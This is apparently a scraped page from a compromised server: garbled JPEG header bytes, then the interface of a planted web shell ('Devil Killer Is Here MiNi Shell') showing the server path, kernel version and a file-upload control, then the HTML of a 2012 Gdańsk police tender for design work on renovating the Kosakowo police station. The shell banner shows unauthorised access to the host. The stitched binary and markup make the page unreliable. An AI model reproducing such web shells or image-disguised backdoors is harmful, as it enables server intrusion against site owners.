JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120316/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120316/82608-N-2012.html

<p class="kh_header"><b>Gdańsk: PRZETARG NIEOGRANICZONY 
na opracowanie dokumentacji technicznej projektowej dla zamierzenia Remont budynku KP w Kosakowie .</b><br>
<b>Numer ogłoszenia: 82608 - 2012; data zamieszczenia: 16.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Gdańsku , ul. Okopowa 15, 80-819 Gdańsk, woj. pomorskie, tel. 058 3214817, faks 058 3214810.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZETARG NIEOGRANICZONY 
na opracowanie dokumentacji technicznej projektowej dla zamierzenia Remont budynku KP w Kosakowie ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie pełnej, wielobranżowej dokumentacji projektowej  budowlanej i wykonawczej wraz z przedmiarami i kosztorysami inwestorskimi dla każdej branży wykonanymi jako  szczegółowe w oparciu           o KNR-y, wykonanie szczegółowych specyfikacji technicznych wykonania               i odbioru robót budowlanych, oraz uzyskanie pozwolenia na budowę dla zadania Remont budynku KP w Kosakowie.
wykonanie dokumentacji projektowej wraz z potwierdzeniem złożenia wniosku o pozwolenie na budowę - 25.05.2012 r

       
I. CZĘŚĆ OPISOWA
1. Opis ogólny przedmiotu zamówienia
Przedmiotem zamówienia jest wykonanie pełnej wielobranżowej dokumentacji  projektowej budowlanej i wykonawczej wraz z przedmiarami i kosztorysami inwestorskimi dla każdej branży wykonanymi jako szczegółowe w oparciu o KNR-y, wykonanie szczegółowych Specyfikacji Technicznych Wykonania 
i Odbioru Robót Budowlanych  oraz uzyskanie pozwolenia na budowę dla zadania Modernizacja Komisariatu Policji w Kosakowie ul. Żeromskiego 71. 
Przedmiotem opracowania jest remont budynku służbowego Policji wraz z przebudową istniejącego układu funkcjonalnego pomieszczeń Komisariatu w związku ze zwiększeniem powierzchni służbowej jednostki o powierzchnię lokalu mieszkalnego na parterze budynku komisariatu oraz  o pomieszczenia parteru w nowo wybudowanym przez Gminę łączniku i powiązanie wszystkich pomieszczeń w spójny układ funkcjonalny dla potrzeb 15- osobowej obsady Komisariatu.
1.1. Informacje ogólne.
Dane o terenie
Nieruchomość, na której zlokalizowana jest siedziba Komisariatu Policji  Kosakowo składa się z trzech działek o nr geodezyjnych 146/10;148/8;147/2 o łącznej pow. 983,0 m2  i położona jest przy ul. Żeromskiego w Kosakowie. Na działce nr 146/10 usytuowany jest dwukondygnacyjny budynek komisariatu o pow. zabudowy 157,6 m2 oraz łączący Urząd Gminy i Komisariat Policji budynek 
biurowo - usługowy o pow. zabudowy 86 m2. Granicę lokalizacji wyznaczają: od wschodu ul. Żeromskiego, od północy droga gminna, od południa budynek Urzędu Gminy, od zachodu droga gospodarcza. Konfiguracja terenu zróżnicowana: w części przylegającej do nowego budynku teren  jest płaski, następnie  znacznie opada do północnego narożnika starego budynku i znów się wypłaszcza, opadając łagodnie do drogi gminnej. W kierunku wschodnim teren opada niewielką skarpą do ulicy Żeromskiego. Od strony zachodniej występuje  niewielkie wzniesienie terenu. Dojazd na zaplecze  KP od strony drogi gospodarczej przez bramę wjazdową z siatki w ramach stalowych. Nawierzchnia wjazdu utwardzona trylinką. Teren posesji częściowo ogrodzony siatką w ramach na cokole betonowym i  siatką na słupach stalowych.
Na nieruchomości występuje pełne uzbrojenie infrastruktury sieciowej. Przed budynkiem zlokalizowany jest tymczasowy maszt antenowy dla potrzeb łączności radiowej zainstalowany na słupie prefabrykowanym..   
Stan prawny
Nieruchomość stanowi własność Skarbu Państwa w trwałym zarządzie Komendy Wojewódzkiej Policji w Gdańsku.
Opis stanu istniejącego 
Budynek Komisariatu.
Przedmiotowy budynek wzniesiony w technologii tradycyjnej wybudowany na początku lat 70 - tych ubiegłego wieku jako typowy obiekt administracyjno - mieszkalny o dwóch kondygnacjach nadziemnych, podpiwniczony, ze stropodachem typu DZ-3, dwuspadowym krytym papą. Budynek wyposażony jest w instalacje wodno - kanalizacyjną, centralnego ogrzewania, gazową, elektryczną        i teletechniczną. Powierzchnia użytkowa budynku wynosi 342 m2, kubatura 1 325 m3. 


Komisariat Policji zajmuje  część parteru i część pomieszczeń piwnicznych o łącznej powierzchni użytkowej 119,3 m2 . 
Wejście do jednostki schodami zewnętrznymi zlokalizowane jest przy południowym szczycie budynku. Obecnie na parterze  znajduje się poczekalnia, dyżurka, pokój Komendanta, pokój biurowy, szatnia, WC, magazynek, składzik gospodarczy i komunikacja. 
W podpiwniczeniu komisariat użytkuje 6 pomieszczeń - garaż, kotłownię gazową, magazyn i 3 piwnice. Wysokość kondygnacji piwnicznej w świetle 2,2 m, poza garażem, którego wysokość w świetle kondygnacji wynosi 2,5 m. 
Do części mieszkalnej prowadzi wejście usytuowane od zaplecza budynku. Komunikację pionową stanowi żelbetowa klatka schodowa. Na parterze znajduje się jedno mieszkanie typu M-4 składające się   z dwóch pokoi, kuchni , przedpokoju i łazienki o łącznej powierzchni 48,7 m2. Na piętrze znajdują się dwa mieszkania typu  M-4 o powierzchni 51,6 m2 i 48,7 m2 oraz wydzielona  suszarnia bielizny         o pow.5,8 m2. Do każdego mieszkania przynależy pomieszczenie piwniczne.
Budynek biurowo - usługowy ( plomba)
Wybudowany w 2011r  w zabudowie plombowej budynek o dwóch kondygnacjach nadziemnych 
z wieżą zakończoną iglicą. Funkcja budynku : parter o powierzchni 66,2 m2  przeznaczono na potrzeby komisariatu, piętro na potrzeby gminy ( sala narad). Dostęp do nowych pomieszczeń komisariatu 
z poziomu terenu. Na parterze zlokalizowano wiatrołap, poczekalnię, WC interesantów, dyżurkę, pomieszczenie pomocnicze dyżurnych, pokój biurowy 3 osobowy, szatnię z węzłem sanitarnym 
i komunikację. Pomieszczenia wykończone są w stanie deweloperskim tj. wymagają wykonania robót wykończeniowych w zakresie podłóg, malowania, okładzin ściennych oraz białego montażu i opraw oświetleniowych.

1.2. Planowany zakres rzeczowy zamierzenia
Zamierzenie polegać będzie na remoncie bieżącym budynku służbowego Policji obejmującym swym zakresem roboty ogólnobudowlane wraz z dociepleniem budynku, wymianę instalacji elektrycznych, sanitarnych i teletechnicznych oraz wykonanie robót wykończeniowych w części nowo wybudowanej 
i zagospodarowanie terenu w powiązaniu  z istniejącym układem pieszo - jezdnym.
Zakres modernizacji
Główne prace modernizacyjne obejmować będą przebudowę układu funkcjonalnego pomieszczeń parteru w związku ze zwiększeniem powierzchni służbowej komisariatu o były lokal mieszkalny               i dobudowany łącznik. Remont części mieszkalnej  na piętrze przeprowadzony będzie w zakresie niezbędnym do realizacji zamierzenia. Założono, że istniejące pomieszczenia parteru zostaną zaadaptowane pod funkcję biurową i socjalno - sanitarną, a pomieszczenia piwniczne pod funkcje magazynową ,techniczną i garaż. Dotychczasowe wejście do części służbowej komisariatu zostanie zlikwidowane, w to miejsce zostanie osadzone okno. Przewiduje się wymianę stolarki okiennej 
i drzwiowej, naprawę i wykonanie nowych tynków i posadzek, wymianę instalacji technicznych w całym budynku, remont pomieszczeń piwnicznych, malowanie pomieszczeń, wymianę bramy garażowej oraz docieplenie budynku.  
W ramach zagospodarowania terenu przewiduje się wydzielenie miejsc parkingowych dla interesantów i pojazdów służbowych, wykonanie ciągów pieszo-jezdnych, wykonanie ogrodzenia z automatyczną bramą na wjeździe, osłony śmietnikowej i zieleni.
Przewiduje się całkowitą wymianę instalacji  technicznych, które należy przystosować do  nowej funkcji pomieszczeń i potrzeb  każdego użytkownika budynku oraz wyposażyć w niezależne układy pomiarowe w celu odrębnego rozliczania kosztów eksploatacyjnych. 

Zakłada się, że nowe instalacje wewnętrzne wod - kan wykonane będą w oparciu o istniejące przyłącze wodociągowe i kanalizacji sanitarnej. Instalacja zimnej wody doprowadzona będzie do armatury nad nowoprojektowane urządzenia sanitarne. Instalacja wody ciepłej funkcjonować będzie w oparciu 
o nowoprojektowane elektryczne pojemnościowe podgrzewacze wody o pojemności 100l 
i  podgrzewacze podumywalkowe o pojemności 5 l. Instalacje wody zimnej i ciepłej zaprojektować z rur stalowych gwintowanych ocynkowanych, podejścia w bruzdach z PE sieciowanego, rurociągi izolowane. Zużycie wody rejestrować winny lokalne wodomierze. Nowoprojektowana instalacja kanalizacji sanitarnej wykonana z rur kanalizacyjnych kielichowych PVC. Piony wyprowadzić ponad dach i zakończyć wywiewkami wentylacyjnymi, u podstawy zaopatrzyć w rewizję. Źródłem ciepła dla instalacji c.o. jest zlokalizowana w piwnicy kotłownia gazowa z kotłem o mocy 29 kW. Jako elementy grzejne należy przewidzieć grzejniki płytowe CV z wkładką zaworową podwójnej regulacji i głowicą termostatyczną. Grzejniki montować za pomocą podwójnych kątowych zaworów przyłączeniowych. Należy przewidzieć częściową wymianę instalacji gazowej. Instalację wykonać z  rur stalowych czarnych bez szwu, spawanych, ograniczając stosowanie kształtek kutolanych na podejścia pod przybory i gazomierze. Przybory gazowe łączyć z instalacją na sztywno. Poza wentylacją grawitacyjną przewiduje się wykonanie wentylacji wspomagającej z zastosowaniem wentylatorków ściennych we wszystkich pomieszczeniach socjalno - sanitarnych  i sali odpraw. 
Zdemontowana zostanie wraz z osprzętem cała instalacja elektryczna w budynku. Zakłada się, że istniejące układy pomiarowe zostaną zachowane. Z układów pomiarowych należy poprowadzić WLZ-ty do rozdzielni w mieszkaniach ( do rozdzielni RE Komisariatu zlokalizowanej w dobudowanym łączniku nowy  WLZ-et został ułożony). Przewidzieć należy również  wykonanie połączeń wyrównawczych głównych i miejscowych oraz zabezpieczenie instalacji rozdzielni RE. Instalacje należy zaprojektować  w układzie TNS 230/400V. Należy również uwzględnić zmniejszenie liczby liczników elektrycznych do trzech. Przewidywana moc przyłączeniowa ca 25 kW. Przewiduje się też wymianę instalacji odgromowej i oświetlenia zewnętrznego. 
Zakłada się przeniesienie punktu dystrybucyjnego okablowania strukturalnego  do nowego pomieszczenia łączności w oparciu o istniejące instalacje oraz nowoprojektowaną instalację klimatyzacji. Umiejscowienie zespołów przyłączeniowych elektryczno-logicznych PEL 
w pomieszczeniach należy rozbudować i  dostosować do nowej aranżacji pomieszczeń. Systemem kontroli dostępu oraz sygnalizacji włamania i napadu wraz z montażem drzwi antywłamaniowych należy objąć wejście do komisariatu od klatki schodowej na parterze ( wyjście ewakuacyjne) i do wydzielonej części magazynowej podpiwniczenia. W  oknie wewnętrznym dyżurki należy zainstalować interkom typu duplex z możliwością blokowania mikrofonu przez dyżurnego. Na dachu budynku istniejącego należy zaprojektować kratowy maszt aluminiowy o wys. min. 15 m z iglicą odgromową i trzema kompletami odskoczni do zamocowania anteny prętowej ASD131.




Nowy układ funkcjonalny
Po modernizacji siedzibę Komisariatu Policji stanowić będzie lokal użytkowy o powierzchni 234,2 m2. 
Wejście główne do Komisariatu  zlokalizowano w łączniku. Dostęp do pomieszczeń  przez poczekalnię, usytuowaną przy dyżurce, oddzieloną od części służbowej ścianką przeszkloną z drzwiami wyposażonymi w zamek elektromagnetyczny sterowany z dyżurki. 
Poczekalnia skomunikowana z sanitariatem interesantów przystosowanym do potrzeb osób niepełnosprawnych. W dyżurce znajduje się okno podawcze do poczekalni wyposażone w Intercom      i szufladę podawczą do przekazywania dokumentów.
W pobliżu dyżurki po stronie służbowej jednostki umiejscowiono tzw. pomieszczenie pomocnicze dyżurnych przeznaczone dla osób doraźnie zatrzymanych, którego wyposażenie stanowi krata na wejściu z otwieranym skrzydłem i ława drewniana na stałe przytwierdzona do podłoża.  
W pozostałej części dobudowy zlokalizowano pokój 3-osobowy, szatnię męską dla 6 osób z węzłem sanitarnym i korytarz prowadzący do starej części budynku, gdzie zlokalizowano pokój socjalny, pomieszczenie porządkowe, pomieszczenie gospodarcze,  szatnię damską dla 4 osób z węzłem sanitarnym, pokój odpraw- notatek, WC ogólnodostępne, sekretariat, pokój Komendanta, pokój biurowy 1osobowy i pokój 2-osobowy, pomieszczenie łączności i korytarz. Wyjście ewakuacyjne od zaplecza budynku, wejście do podpiwniczenia istniejąca klatką schodową. W wygrodzonej części piwnic zaplanowano pomieszczenia magazynowe i kotłownię. W pozostałej części podpiwniczenia przewidziano pomieszczenie gospodarcze ( pod schodami) i  dwie piwnice lokatorskie.
Dostęp do garażu wyłącznie od zewnątrz budynku. 
Zakres robót w podziale na branże
Roboty budowlane
- zamurowanie wejścia głównego  z osadzeniem nowego okna
- rozbiórka schodów zewnętrznych  przy dawnym wejściu głównym
- rozbiórka murku oporowego i  nawierzchni z trylinki
- rozbiórka daszku nad wejściem 
- rozbiórka rynien, rur spustowych i opierzeń blacharskich
- rozbiórka ogrodzenia 
- rozebranie  posadzek cementowych, z tworzyw sztucznych i lastryka
- częściowa rozbiórka cokołu pod kocioł w kotłowni
- rozebranie warstwy podbudowy posadzek cementowych na gruncie  ( wykopy wewnątrz budynków ) w wytypowanych pomieszczeniach
- wymiana podkładów na podłożu gruntowym w wytypowanych pomieszczeniach
- wykonanie izolacji przeciwwilgociowej poziomej i termicznej posadzek na gruncie
- wykonanie izolacji pionowej ścian fundamentowych i poziomej ław fundamentowych
- wykonanie izolacji przeciwwilgociowej w pomieszczeniach sanitarnych komisariatu
- wykonanie posadzek z gresu ,terakoty,  ze zgrzewalnego PCV i wykładziny dywanowej 
- wykucie krat okiennych i ościeżnic stalowych
- wymiana w całym budynku pozostałych okien istniejących na  okna  PCV  
- przebudowa układu ścian działowych z wykonaniem nadproży, 
- skucie odspajających się tynków ścian i stropów
- wymiana wraz z osprzętem i armaturą wszystkich instalacji technicznych i dostosowanie ich wraz 
  z wentylacją do nowego układu pomieszczeń w komisariacie
- wymiana instalacji technicznych w mieszkaniach w niezbędnym zakresie
- zamurowanie bruzd w mieszkaniach po wymianie instalacji
- wykonanie nowych  i naprawa tynków istniejących
- wykonanie gładzi gipsowych w pomieszczeniach dobudowy
- malowanie pomieszczeń dobudowy, klatki schodowej i piwnic
- tapetowanie ścian tapetą fizelinową  pomieszczeń parteru w części istniejącej
- licowanie ścian glazurą w pom.sanitarnych i kotłowni
- wykonanie fartucha z glazury w pomieszczeniu socjalnym
- wymiana stolarki drzwiowej wewnętrznej i zewnętrznej
- montaż drzwi antywłamaniowych
- wykonanie konstrukcji pod montaż masztu aluminiowego na  dachu budynku
- wymianie papowego pokrycia dachu i docieplenie stropodachu,
- docieplenie ścian zewnętrznych wraz z wykonaniem wyprawy elewacyjnej,
- wykonanie rynien i rur spustowych i opierzeń blacharskich,
- demontaż antenowego, wolnostojącego słupa prefabrykowanego 
- okratowanie okien w poziomie piwnic i wytypowanych pomieszczeniach parteru
- przyklejenie folii samoprzylepnej nieprzeziernej w dyżurce, 
- naprawa schodów zewnętrznych przy klatce schodowej
- naprawa schodów zewnętrznych przy garażu
-  ewentualna wycinka  drzew i krzewów kolidujących z planowaną inwestycją
- wykonanie ogrodzenia systemowego o wysokości 2,0 m z paneli ogrodzeniowych z drutu    zgrzewalnego  z automatyczną przesuwną bramą na wjeździe otwieraną za pomocą siłowników.
-  wykonanie parkingów, dróg i chodników - nawierzchnia z kostki brukowej
-  wykonanie osłony śmietnikowej
Roboty sanitarne
-  częściowa wymiana instalacji gazowej na rury spawane
-  wymiana instalacji c.o. łącznie z grzejnikami
-  wymiana istniejących instalacji wodociągowej i kanalizacji sanitarnej   wraz z montażem przyborów sanitarnych i armatury w niezbędnym   zakresie    wynikającym z nowej funkcji pomieszczeń 
- wykonanie instalacji wentylacji mechanicznej wspomagającej w pomieszczeniach sanitarnych               i pokoju   odpraw
Roboty elektryczne
Wykonanie instalacji:
- oświetlenia ogólnego spełniającego wymogi pracy przy komputerze, 
- oświetlenia awaryjnego 
- oświetlenia zewnętrznego
- gniazd wtyczkowych ogólnych o napięciu znamionowym 230 V
-  gniazd zasilania dedykowanego 230V  wraz z zasilaczem awaryjnym UPS 5 KW. 
- ochrony przeciwprzepięciowej obejmującej instalacje i urządzenia elektryczne
- zasilania i sterowania pracą kotłowni gazowej
- zasilania systemów łączności i informatyki, dozoru i sygnalizacji
- połączeń wyrównawczych głównych i miejscowych
- gniazda z przełącznikiem 3- położeniowym dla przewoźnego agregatu prądptwórczego
- odgromowej połączonej z iglicą odgromową masztu antenowego 
- sterowania siłownikami bramy
Roboty teletechniczne
- przeniesienie punktu dystrybucyjnego okablowania strukturalnego do pom. łączności
- przeniesienie klimatyzatora jednostki wewnętrznej typu Split 
- montaż interkomu typu duplex w oknie dyżurki
   - wykonanie systemów  kontroli dostępu, alarmu włamania i napadu  w powiązaniu z istniejącymi 
instalacjami w łączniku
- montaż aluminiowego kratowego masztu antenowego  o wys.15 m  z trzema kompletami odciągów na dachu budynku
- montaż instalacji antenowej UKF
- wykonanie instalacji klimatyzacji  w pomieszczeniu łączności
- montaż klimatyzatora
1. 2. Wymagania zamawiającego w stosunku do przedmiotu zamówienia
Przed przystąpieniem do prac projektowych należy wykonać:
-  inwentaryzację budowlaną  obiektu w zakresie  niezbędnym do realizacji  zamówienia wraz 
    z niezbędnymi odkrywkami elementów konstrukcyjnych
-  orzeczenie techniczne stanu konstrukcji 
2. CZĘŚĆ INFORMACYJNA
1. Wykonawca zobowiązany jest zrealizować przedmiot zamówienia spełniając wymagania :
1) Ustawy Prawo Budowlane (tekst jedn. Dz.U. z 2003r. nr 207, poz.2016 
z późniejszymi zmianami)
2)	Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. nr 75 poz.690 
z późniejszymi zmianami)
3)	Innych ustaw i rozporządzeń, polskich norm , zasad wiedzy technicznej i sztuki budowlanej.
4).   Wytycznymi programowymi 
2. Zamawiający dysponuje:
-  Projektem budowlanym p.n. Zabudowa plombowa pomiędzy budynkiem Gminy a Komisariatem Policji
-  Dokumentacją powykonawczą Zabudowa plombowa pomiędzy budynkiem Gminy a Komisariatem   Policji
- Szkicem planowanego układu funkcjonalnego pomieszczeń.
2.1. Zakres prac projektowych 
Kompletna dokumentacja projektowa winna obejmować:
-	inwentaryzację budowlaną obiektu w zakresie  niezbędnym do realizacji zamówienia ,
-	orzeczenie techniczne o możliwości adaptacji pomieszczeń do nowej funkcji,
-	ekspertyzę kominiarską
-      projekt budowlany wraz z informacją dotyczącą bezpieczeństwa i ochrony zdrowia      
-	projekt wykonawczy zagospodarowania terenu z uwzględnieniem wycinki drzew i krzewów
-	projekt wykonawczy drogowy
-	projekt wykonawczy architektoniczno-konstrukcyjny 
-	projekt kolorystyki elewacji
-	projekt wykonawczy instalacji wod- kan
-	projekt wykonawczy instalacji c.o.
-	projekt wykonawczy instalacji automatyki pogodowej kotła gazowego
-	projekt wykonawczy wentylacji mechanicznej wspomagającej
-	projekt wykonawczy instalacji elektrycznych
-	projekt wykonawczy instalacji odgromowej
-      projekt wykonawczy instalacji teletechnicznych
- 	projekt wykonawczy instalacji klimatyzacji 
-   szczegółowych specyfikacji technicznych wykonania i odbioru robót budowlanych dla każdej branży oddzielnie
-     kosztorysów inwestorskich dla każdej branży
-     przedmiarów robót dla każdej branży
-     wizualizację budynku
a także
-  pozwolenie na budowę.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się przynajmniej jednym projektem w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia, z podaniem ich powierzchni, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi zaprezentować min. 1 zespół kadry technicznej w następującym składzie:  
- 1 osoba posiadająca uprawnienia budowlane w specjalności architektonicznej,
- 1 osoba posiadająca uprawnienia budowlane o specjalności  budowlano-konstrukcyjnej,
- 1 osoba posiadająca uprawnienia budowlane o specjalności instalacje elektryczne,
- 1 osoba posiadająca uprawnienia budowlane o specjalności instalacje sanitarne,
- 1 osoba posiadająca uprawnienia budowlane o specjalności telekomunikacyjnej
w zakresie projektowania obejmującego roboty budowlane, instalacyjne w obiektach o charakterze budynków stanowiących przedmiot zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

